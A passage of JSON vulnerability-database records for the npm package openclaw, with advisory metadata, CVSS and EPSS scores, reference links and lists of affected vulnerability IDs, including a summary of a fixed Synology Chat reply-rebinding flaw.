                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dqb2-dej7-augt"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-h9a4-1twb-d7d1"
                        },
                        {
                            "vulnerability": "VCID-hy24-6xpe-pkb7"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-k8x3-9pv7-rfax"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pj41-sunw-vbcj"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-rvcq-rqbq-4khp"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2yd-uw91-9yck"
                        },
                        {
                            "vulnerability": "VCID-wyat-1259-2kg9"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.9"
                }
            ],
            "aliases": [
                "CVE-2026-43569",
                "GHSA-939r-rj45-g2rj"
            ],
            "risk_score": 4.0,
            "exploitability": "0.5",
            "weighted_severity": "8.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-arks-g6hw-abbw"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91806?format=api",
            "vulnerability_id": "VCID-asuy-amja-eyd4",
            "summary": "OpenClaw: Synology Chat reply delivery could be rebound through username-based user resolution.\n## Summary\nSynology Chat reply delivery could rebind to a mutable username match instead of the stable numeric user_id recorded by the webhook event. Because a username can change while the numeric user_id does not, a reply could then reach a different account than the one that sent the original message.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected: < 2026.3.22\n- Fixed: >= 2026.3.22\n- Latest released tag checked: `v2026.3.23-2` (`630f1479c44f78484dfa21bb407cbe6f171dac87`)\n- Latest published npm version checked: `2026.3.23-2`\n\n## Fix Commit(s)\n- `7ade3553b74ee3f461c4acd216653d5ba411f455`\n\n## Release Status\nThe fix shipped in `v2026.3.22` and remains present in `v2026.3.23` and `v2026.3.23-2`.\n\n## Code-Level Confirmation\n- extensions/synology-chat/src/webhook-handler.ts now keeps replies bound to the stable webhook user identifier unless an explicit dangerous opt-in is enabled.\n- extensions/synology-chat/src/config-schema.ts contains the explicit dangerous opt-in seam instead of silent username rebinding.\n\nOpenClaw thanks @nexrin for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35670",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00096",
                            "scoring_system": "epss",
                            "scoring_elements": "0.26596",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00096",
                            "scoring_system": "epss",
                            "scoring_elements": "0.26636",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00096",
                            "scoring_system": "epss",
                            "scoring_elements": "0.26645",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35670"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.9",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:L/A:N"
                        },
                        {
                            "value": "6.0",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.9",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:L/A:N"
                        },
                        {
                            "value": "6",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "6.0",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-14T14:59:29Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/7ade3553b74ee3f461c4acd216653d5ba411f455",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.9",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:L/A:N"
                        },
                        {
                            "value": "6",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "6.0",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-14T14:59:29Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/7ade3553b74ee3f461c4acd216653d5ba411f455"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-wv46-v6xc-2qhf",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.9",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "6",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "6.0",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-14T14:59:29Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-wv46-v6xc-2qhf"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35670",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.9",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:L/A:N"
                        },
                        {
                            "value": "6.0",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35670"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-webhook-reply-rebinding-via-username-resolution-in-synology-chat",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.9",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:L/A:N"
                        },
                        {
                            "value": "6",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "6.0",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-14T14:59:29Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-webhook-reply-rebinding-via-username-resolution-in-synology-chat"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-wv46-v6xc-2qhf",
                    "reference_id": "GHSA-wv46-v6xc-2qhf",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-wv46-v6xc-2qhf"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109983?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.22",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1j3m-fecr-f7cn"
                        },
                        {
                            "vulnerability": "VCID-1p3b-pfnn-x7ad"
                        },
                        {
                            "vulnerability": "VCID-1p5p-eth5-3ufu"
                        },
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-1smq-mbty-jkaj"
                        },
                        {
                            "vulnerability": "VCID-24m7-jx1g-hqde"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-26kp-dbu2-pqej"
                        },
                        {
                            "vulnerability": "VCID-26sg-e29u-hkf3"
                        },
                        {
                            "vulnerability": "VCID-26sv-grsd-abcw"
                        },
                        {
                            "vulnerability": "VCID-294z-6z8j-97bx"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2hca-3v8f-f3e8"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-2uqu-k42d-1baq"
                        },
                        {
                            "vulnerability": "VCID-2v8n-mnws-jfc9"
                        },
                        {
                            "vulnerability": "VCID-2wr9-h42m-a7ev"
                        },
                        {
                            "vulnerability": "VCID-32zs-2zs9-uufs"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-37ep-9smd-zuh9"
                        },
                        {
                            "vulnerability": "VCID-384t-z1h8-pfft"
                        },
                        {
                            "vulnerability": "VCID-38g8-39ek-xbat"
                        },
                        {
                            "vulnerability": "VCID-3bdd-a9nw-13bn"
                        },
                        {
                            "vulnerability": "VCID-3wsw-d4z2-dydt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-3zx4-t8cj-kbfn"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4hz5-f2pw-3yb4"
                        },
                        {
                            "vulnerability": "VCID-4jwj-6s5z-wbeq"
                        },
                        {
                            "vulnerability": "VCID-4nwq-14y4-xkhp"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4uqc-3h1c-4yhs"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-5atj-2a7b-57g5"
                        },
                        {
                            "vulnerability": "VCID-5rgx-2krs-guck"
                        },
                        {
                            "vulnerability": "VCID-6849-th74-yqd5"
                        },
                        {
                            "vulnerability": "VCID-6bxd-kbse-sudx"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7dyw-9b37-yqh4"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7wmr-v7zb-6fc9"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-8uzb-xmf8-hbca"
                        },
                        {
                            "vulnerability": "VCID-8z7r-a8dv-eueb"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9jjv-aa8k-rke1"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9pj9-7b12-jbea"
                        },
                        {
                            "vulnerability": "VCID-9uyu-y9qv-u7e1"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-9xrt-mv81-3yc8"
                        },
                        {
                            "vulnerability": "VCID-9yxw-fj1c-tff9"
                        },
                        {
                            "vulnerability": "VCID-a2p8-ydn6-3bbr"
                        },
                        {
                            "vulnerability": "VCID-a2wx-7b8h-c3h1"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-atn7-pn13-3fgb"
                        },
                        {
                            "vulnerability": "VCID-axp9-mt9z-gkgw"
                        },
                        {
                            "vulnerability": "VCID-aye6-1fwu-nkc5"
                        },
                        {
                            "vulnerability": "VCID-b9w3-w2nq-cqg6"
                        },
                        {
                            "vulnerability": "VCID-bg1d-gmxy-wkc6"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bk76-1ctt-tkaw"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-bnfh-rsk9-cfea"
                        },
                        {
                            "vulnerability": "VCID-brfj-4shr-qkgc"
                        },
                        {
                            "vulnerability": "VCID-bumq-54sb-6ua7"
                        },
                        {
                            "vulnerability": "VCID-bzw7-yvu2-yqa2"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-c4yt-z48z-zygv"
                        },
                        {
                            "vulnerability": "VCID-c76v-4577-n7c6"
                        },
                        {
                            "vulnerability": "VCID-carm-gpgh-wbbf"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-csnc-r6fv-j3en"
                        },
                        {
                            "vulnerability": "VCID-cvmw-sxfq-dyhz"
                        },
                        {
                            "vulnerability": "VCID-cvxu-rdbu-abd2"
                        },
                        {
                            "vulnerability": "VCID-cwd3-ecym-sfaw"
                        },
                        {
                            "vulnerability": "VCID-d3qp-5wm9-aqfp"
                        },
                        {
                            "vulnerability": "VCID-d864-qy75-c3dx"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-da47-zdf1-mfgf"
                        },
                        {
                            "vulnerability": "VCID-dbcw-brhj-k7hs"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-djqx-bwuu-4uc1"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fekn-d6f3-xfa6"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-g3hg-peh1-tudm"
                        },
                        {
                            "vulnerability": "VCID-g8r6-x6s5-uydq"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-gvam-2net-8kc5"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hd4w-s3dp-nubj"
                        },
                        {
                            "vulnerability": "VCID-hkqd-6khg-m3hj"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-j8fb-fhyc-33fu"
                        },
                        {
                            "vulnerability": "VCID-j92n-5217-9bhj"
                        },
                        {
                            "vulnerability": "VCID-j96c-kau3-7fag"
                        },
                        {
                            "vulnerability": "VCID-jbwa-scg3-efeq"
                        },
                        {
                            "vulnerability": "VCID-jdqk-kv8u-xqa9"
                        },
                        {
                            "vulnerability": "VCID-jhah-j2td-t3dp"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-jtxm-z4vv-cqg7"
                        },
                        {
                            "vulnerability": "VCID-k3up-1vdf-2uh9"
                        },
                        {
                            "vulnerability": "VCID-k52b-966p-ybbk"
                        },
                        {
                            "vulnerability": "VCID-k5da-7tht-w3bs"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kzgh-7f6h-kfd1"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mcz5-wgu1-z7g7"
                        },
                        {
                            "vulnerability": "VCID-mggy-bv5s-5uax"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nfva-pukn-uqch"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7me-4bzz-83cm"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pa1f-qzsh-efa9"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pc9z-x5wk-8ue7"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-q9jf-srt4-fbcg"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-qjvc-etb4-qbfv"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-r9y1-z2ax-z3e2"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-s3wz-3yzf-ybhz"
                        },
                        {
                            "vulnerability": "VCID-sja9-6t41-hud8"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-t991-75e7-ykdv"
                        },
                        {
                            "vulnerability": "VCID-te8f-snty-j7hh"
                        },
                        {
                            "vulnerability": "VCID-tf28-1z2z-5yfn"
                        },
                        {
                            "vulnerability": "VCID-tk9h-nqrz-uugp"
                        },
                        {
                            "vulnerability": "VCID-u1ru-vdfp-x3hu"
                        },
                        {
                            "vulnerability": "VCID-u6hw-ffpj-4yd9"
                        },
                        {
                            "vulnerability": "VCID-u9cw-crg5-1kbs"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-uy97-p1ex-y7df"
                        },
                        {
                            "vulnerability": "VCID-v1bp-hw9a-yffz"
                        },
                        {
                            "vulnerability": "VCID-v91b-1nmx-ckcx"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vktg-77tu-vycv"
                        },
                        {
                            "vulnerability": "VCID-vm8g-hrvu-quhm"
                        },
                        {
                            "vulnerability": "VCID-vqrj-z6tx-rff2"
                        },
                        {
                            "vulnerability": "VCID-vtqt-bgz7-yub6"
                        },
                        {
                            "vulnerability": "VCID-vx5d-3d98-7kf3"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2rd-2j4p-gfgw"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-watb-49vx-yub1"
                        },
                        {
                            "vulnerability": "VCID-wkye-je9r-1fba"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wut7-y72y-9ucb"
                        },
                        {
                            "vulnerability": "VCID-wx44-n3fr-skah"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-x4hn-ygbg-mkep"
                        },
                        {
                            "vulnerability": "VCID-x794-wfnf-1ugf"
                        },
                        {
                            "vulnerability": "VCID-x7uw-s9a6-fybd"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xpr3-hg3h-z3bz"
                        },
                        {
                            "vulnerability": "VCID-xryt-a83q-q7et"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-xvhd-w4tv-tqhr"
                        },
                        {
                            "vulnerability": "VCID-xz8s-hj5s-wfgj"
                        },
                        {
                            "vulnerability": "VCID-xzg5-ren5-p7gw"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ykwt-tdpa-3bft"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-ynup-4v9e-tbh4"
                        },
                        {
                            "vulnerability": "VCID-yp2w-pc58-9bf6"
                        },
                        {
                            "vulnerability": "VCID-ywrn-52gx-f3ad"
                        },
                        {
                            "vulnerability": "VCID-z7wa-tw2t-vqas"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zac2-wjyt-27af"
                        },
                        {
                            "vulnerability": "VCID-zb5t-hhkm-kfeh"
                        },
                        {
                            "vulnerability": "VCID-zf3q-78js-k7ce"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zkum-rn42-yyfs"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22"
                }
            ],
            "aliases": [
                "CVE-2026-35670",
                "GHSA-wv46-v6xc-2qhf"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-asuy-amja-eyd4"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90150?format=api",
            "vulnerability_id": "VCID-atn7-pn13-3fgb",
